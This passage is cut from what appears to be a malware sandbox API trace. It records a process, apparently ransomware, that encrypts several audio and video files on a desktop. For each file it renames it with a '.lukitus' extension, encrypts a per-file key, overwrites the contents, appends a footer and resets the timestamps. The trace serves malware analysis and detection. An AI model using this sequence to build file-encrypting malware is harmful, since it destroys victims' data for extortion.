ftLastWriteTime.dwHighDateTime=0x1d3049f, nFileSizeHigh=0x0, nFileSizeLow=0xfdb2)) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.837] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\q3jafQj919wjB.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\q3jafqj919wjb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.837] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\q3jafQj919wjB.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\q3jafqj919wjb.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-EC268A58-9F88B8863DE1.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-ec268a58-9f88b8863de1.lukitus"), dwFlags=0x9) returned 1 [0108.840] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.840] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.845] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xfdb2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xfdb2, lpOverlapped=0x0) returned 1 [0108.845] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.845] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xfdb2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xfdb2, lpOverlapped=0x0) returned 1 [0108.846] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.846] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64e68ab0, dwHighDateTime=0x1d31760)) [0108.846] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.846] FlushFileBuffers (hFile=0x328) returned 1 [0108.849] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\tdJtW4XGAbfx.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tdjtw4xgabfx.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f41210, ftCreationTime.dwHighDateTime=0x1d30287, ftLastAccessTime.dwLowDateTime=0x2759c210, ftLastAccessTime.dwHighDateTime=0x1d3021c, ftLastWriteTime.dwLowDateTime=0x2759c210, ftLastWriteTime.dwHighDateTime=0x1d3021c, nFileSizeHigh=0x0, nFileSizeLow=0xa6f)) returned 1 [0108.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.850] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\tdJtW4XGAbfx.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tdjtw4xgabfx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.850] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\tdJtW4XGAbfx.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tdjtw4xgabfx.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-B8F49F95-F22F2A860953.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-b8f49f95-f22f2a860953.lukitus"), dwFlags=0x9) returned 1 [0108.852] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.852] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.857] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa6f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa6f, lpOverlapped=0x0) returned 1 [0108.857] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.858] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa6f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa6f, lpOverlapped=0x0) returned 1 [0108.858] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.858] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64e8ec10, dwHighDateTime=0x1d31760)) [0108.858] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.858] FlushFileBuffers (hFile=0x328) returned 1 [0108.861] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\TQO7VlrhrN2iROvxW.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tqo7vlrhrn2irovxw.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17af620, ftCreationTime.dwHighDateTime=0x1d2fe72, ftLastAccessTime.dwLowDateTime=0x1af72e30, ftLastAccessTime.dwHighDateTime=0x1d2fc91, ftLastWriteTime.dwLowDateTime=0x1af72e30, ftLastWriteTime.dwHighDateTime=0x1d2fc91, nFileSizeHigh=0x0, nFileSizeLow=0x1829)) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.861] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\TQO7VlrhrN2iROvxW.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tqo7vlrhrn2irovxw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.862] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\TQO7VlrhrN2iROvxW.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\tqo7vlrhrn2irovxw.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-AE89F080-8D2CF75E7B09.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-ae89f080-8d2cf75e7b09.lukitus"), dwFlags=0x9) returned 1 [0108.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.863] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.868] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1829, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1829, lpOverlapped=0x0) returned 1 [0108.869] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.869] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1829, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1829, lpOverlapped=0x0) returned 1 [0108.869] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64eb4d70, dwHighDateTime=0x1d31760)) [0108.869] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.870] FlushFileBuffers (hFile=0x328) returned 1 [0108.872] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\ulQERW_UXqYGHPV_.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\ulqerw_uxqyghpv_.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1479c830, ftCreationTime.dwHighDateTime=0x1d302e8, ftLastAccessTime.dwLowDateTime=0xc6dc3960, ftLastAccessTime.dwHighDateTime=0x1d2f788, ftLastWriteTime.dwLowDateTime=0xc6dc3960, ftLastWriteTime.dwHighDateTime=0x1d2f788, nFileSizeHigh=0x0, nFileSizeLow=0x15069)) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.872] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.873] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\ulQERW_UXqYGHPV_.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\ulqerw_uxqyghpv_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.873] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\ulQERW_UXqYGHPV_.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\ulqerw_uxqyghpv_.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-1CE0B2C6-914F0C6C68E9.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-1ce0b2c6-914f0c6c68e9.lukitus"), dwFlags=0x9) returned 1 [0108.874] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.874] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.879] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x15069, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x15069, lpOverlapped=0x0) returned 1 [0108.880] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.880] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x15069, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x15069, lpOverlapped=0x0) returned 1 [0108.880] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64eb4d70, dwHighDateTime=0x1d31760)) [0108.881] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.881] FlushFileBuffers (hFile=0x328) returned 1 [0108.884] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\W-MpCtMmi.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\w-mpctmmi.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e05d4d0, ftCreationTime.dwHighDateTime=0x1d2f7af, ftLastAccessTime.dwLowDateTime=0xda110940, ftLastAccessTime.dwHighDateTime=0x1d3025d, ftLastWriteTime.dwLowDateTime=0xda110940, ftLastWriteTime.dwHighDateTime=0x1d3025d, nFileSizeHigh=0x0, nFileSizeLow=0x64bb)) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.884] 